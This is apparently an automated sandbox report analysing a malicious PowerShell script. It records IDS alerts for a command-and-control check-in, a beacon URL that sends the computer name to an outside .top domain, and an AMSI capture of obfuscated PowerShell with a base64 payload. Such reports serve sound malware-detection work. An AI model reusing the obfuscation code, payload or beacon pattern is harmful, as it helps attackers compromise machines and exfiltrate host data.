Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1582507
MD5:237f43b9f810e6c6a16c22f7b13d3432
SHA1:819211cf07c4070f99e7cad5905a1e3f4865628e
SHA256:f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 7208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5012, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7208, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5012, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7208, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T19:21:06.778691+010020577411A Network Trojan was detected192.168.11.204975645.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T19:21:06.778691+010018100001Potentially Bad Traffic192.168.11.204975645.61.136.13880TCP
2024-12-30T19:21:07.503014+010018100001Potentially Bad Traffic192.168.11.2049757142.250.217.19680TCP

Click to jump to signature section

Show All Signature Results
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38539569776.000002085573B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb}d- source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdbions> source: powershell.exe, 00000000.00000002.38575014675.000002086FA3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000000.00000002.38577702964.000002086FFCB000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49757 -> 142.250.217.196:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49756 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49756 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0295X-gxgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=TgkzjJGMk0U9jKryB3VzYZaHGNbgU8MjeqgQIbEgInq8OROoPx_NYGVnnlRugPtpMciDo3Cb6-JTd2N7GpXDC6B0qnKZwIJOQD664y2uujOTQObld23nYXu7atksck_LCVWNwtflHkxPld4G86A0RRA9_OWveJfpamkyxIMspPrUIF2-3U7kApv6_6ZQXGG6DFsu
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: global trafficHTTP traffic detected: GET /m0lf52z7dihtr.php?id=computer&key=66194449366&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0295X-gxgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=TgkzjJGMk0U9jKryB3VzYZaHGNbgU8MjeqgQIbEgInq8OROoPx_NYGVnnlRugPtpMciDo3Cb6-JTd2N7GpXDC6B0qnKZwIJOQD664y2uujOTQObld23nYXu7atksck_LCVWNwtflHkxPld4G86A0RRA9_OWveJfpamkyxIMspPrUIF2-3U7kApv6_6ZQXGG6DFsu
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /m0lf52z7dihtr.php?id=computer&key=66194449366&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0295X-gxgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=TgkzjJGMk0U9jKryB3VzYZaHGNbgU8MjeqgQIbEgInq8OROoPx_NYGVnnlRugPtpMciDo3Cb6-JTd2N7GpXDC6B0qnKZwIJOQD664y2uujOTQObld23nYXu7atksck_LCVWNwtflHkxPld4G86A0RRA9_OWveJfpamkyxIMspPrUIF2-3U7kApv6_6ZQXGG6DFsu
Source: global trafficDNS traffic detected: DNS query: kdemjgebjimkanl.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.38540827413.0000020858D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020859E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.000002085A19A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527
Source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.PP
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.38577476843.000002086FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.~
Source: powershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top
Source: powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527
Source: powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527p
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzVs
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzVs
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.38540827413.0000020858D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkP
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com0
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzVs
Source: powershell.exe, 00000000.00000002.38540827413.000002085941D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD396280660_2_00007FFD39628066
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD39628E120_2_00007FFD39628E12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3961C3DB0_2_00007FFD3961C3DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3961EC400_2_00007FFD3961EC40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3961F2B30_2_00007FFD3961F2B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD39620EFA0_2_00007FFD39620EFA
Source: classification engineClassification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbxs0ior.1vd.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ery1u6abt8kzvqf.(([char[]]@((3701-(9328478/(5404-2837))),(-8432+8543),(1027824/(58182180/(7937680/1252))),(-3743+(2279760/(411+179))),(385140/4585),(-8417+(4072+4456))) -join ''))( $vb6t0ze4my3ul8f ) $ery1u6abt8kzvqf.(([char[]]@((102309/1527),(5611-(813+(12021-7331))),(-5490+(39055773/(7426245/(6928-5863)))),(-4277+(-4724+(5756+3360))),(2487-(21543194/9029))) -join ''))()$4zudplrcemfx0w9.(([char[]]@((-4099+(23287940/5590)),(488484/4523),(1090242/9822),(78315/(7943-(17363-10101))),(2686-2585)) -join ''))()[byte[]] $0s2eox1rbc3i5vz = $vb6t0ze4my3ul8f.((-join (@((6550-(3933+(14040419/(9486-(14596986/3702))))),(10060-(15412-(3608+1855))),(-7853+7918),(-7871+7985),(9071-8957),(451341/(-3976+8629)),(3378-3257))| ForEach-Object { [char]$_ })))() $3mqe4b7hsju19rc=$0s2eox1rbc3i5vz return $3mqe4b7hsju19rc}[System.Text.Encoding]::ascii.((-join (@((6421-(27273250/4295)),(628119/6219),(106+10),(-2238+2321),(4547-(-2888+7319)),(-2222+(15709600/6725)),(232260/2212),(-5970+6080),(-7910+8013))| ForEach-Object { [char]$_ })))((5irawk2dpqsbxzn61j3of79v80c "K+FyZHQ1bGhmMMrqb+VnswWw8ysiz4Y2VIZJDUNOs0dwuH8G1la/YpayUGAgcDVVRq7R4jdoToPd1zwjSew5Ntb9SPoi/sI5w7TPzyKYOT3PfwkLVpWkGozRlZUZf1mNwrTRI0trURaU1Imbx3W0e8iP1hCc3KaFUz2dWyhIEpOTZ0jITZqOlojeF3+VL9nKT5bNl9/Aszee2Z6lI8XUqlvKGh2N2rK9h1G9E5pAi5Cn+3gpavdF2YeCx6PpV2jJyIbJA5Pqc5caDMnPk9SKs2xYVf4wVw7XWN+NFQJDmu8B3dbAhHetVhZuDmBT2aAdewdUWfv7W03EhvFmnxRLA8feFo7ZAZW8iTk1L32AhPvLx9PQUtW0wfjr23ThXtT48HggbR2YyR0/7C3/p829PI9t4wGEojQYb+fHv4Z/97Lj3jIVnTYgIl3eXV5MfMTExP5pj/1mc9hntrvgLRmpkwO7h1+tH/lrUOBjAnlA90m6diFaRQszNavRMoIQ3Eojiga5CiB3RSODGtzWeHxlI5X/UjAC/BFnD3IxzxHFoYRLntTz8r3L600zp4O6WP5TAdFGgyqiMK6GK/lgU7cAzo5buLoh6B2ZdXV14Ynz4QXl4l7xGX2jk5ja61ddj5uhT2VkyQuIk6Wbs8y1e+1VekiPG5GH3ZhMyBYMEsBa0pCQ+1hoO61kDlmtRL5y062Xh/zUIaEvVdpwhjExRNn3uo5P8EG2rt9UslwJBkmpGGUcJEKGJxzk5pkAoKTfgYW6F9io/DJs4l2tqp+X4gkRGp+vvjSHdBLvB/JjXNmHyFjh6d4SCvIjh9xEAMUnhxhoGYOd3HvTtBLJVqSkXzUxT0Zvh3TfrGmx+jcEsC0FF46VZXAV2nac8o/hRd6i6pfX7mBEuLlqndTU9rWDz+4lhi9NswibayxPTlr+teMra4NYiFiLyp0dA+vpFpGf9bL1c62hM+OaoqccyoOgC5aOMnAqupsNP5Gdq2VFuQrNkO+pn/mLjLZHeC2cEErG5pfNIfWbZcfXr2PdG8RDFtrN14G9KZ0GZiQ+hdJmtizeRB4Mr3iYa/SlH4jMjY89TZ+hw/TGGIPcFe7IA0nECNSlF5lu9at0IFZVRbddI68/2uSTs/lz7i5sT+isqMLARXp2/lhud8KAOGsFiulqImh/zKW7lOLFveOnRdqj7HrLFROvSDZTbgGRRLC9JwQfrgoMUkDwnOCf8qi7FnvR1WZfAjSQGXZW1CdO3PPkbPLhrV4jhKWTxpscW/s1PK2Sgb5HxM7wh8Q+MFtN93NyJvN5penAR8hJPgeH+ATxfzNMI2FJltKFTZH2nJvDY2etT5uYn331SsqKF1ziz6jRIxFWe0o3tBNozKBY9UG4T+J3+J34usQWr8dWWZTW5tj626X8OfkRedRsfUrhTtX91QF2PaLngagi0qO3IFW/0AUtDqZmpOLaTxwWb0q0ELtcPOvF31p2SDUZ8GgFeA4fVPbbpFC8HHDCx5Ptg+x70Xenfe4JZYCmJ6Kr/+/bShJhdrsLv7llRWBrFvWhj+5qe8PPSx0PFn8PI2v/jHX6BRQIqsBYCdvZQ9rRwr7ClLpqueQ67ZvQa40WUr0IpeK9mNkfJGsZrsDX53pFl9hpwuEIbLzsqz9ArWnBw3lhTkfQH2lQ+1en5hJ/20hGvqB7bZP8VRMTS+7Ql1eGU0YLvJLFJAQu5n2PN7qF8+nQzOv+cZ7dhXIU/UiMDh9AkH7o866TqyAuRaQxyS30oS/5fW2tO0qpQsXfDD3S3heRsNldpo/1J7NK/+c91U6FIp0qfUaU8wHD6ftVcvckEMACOOeoR6bU1FPRLcsLKCmE+8v6O+9SmruKlLUSWopQitI+DM7gyZrT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
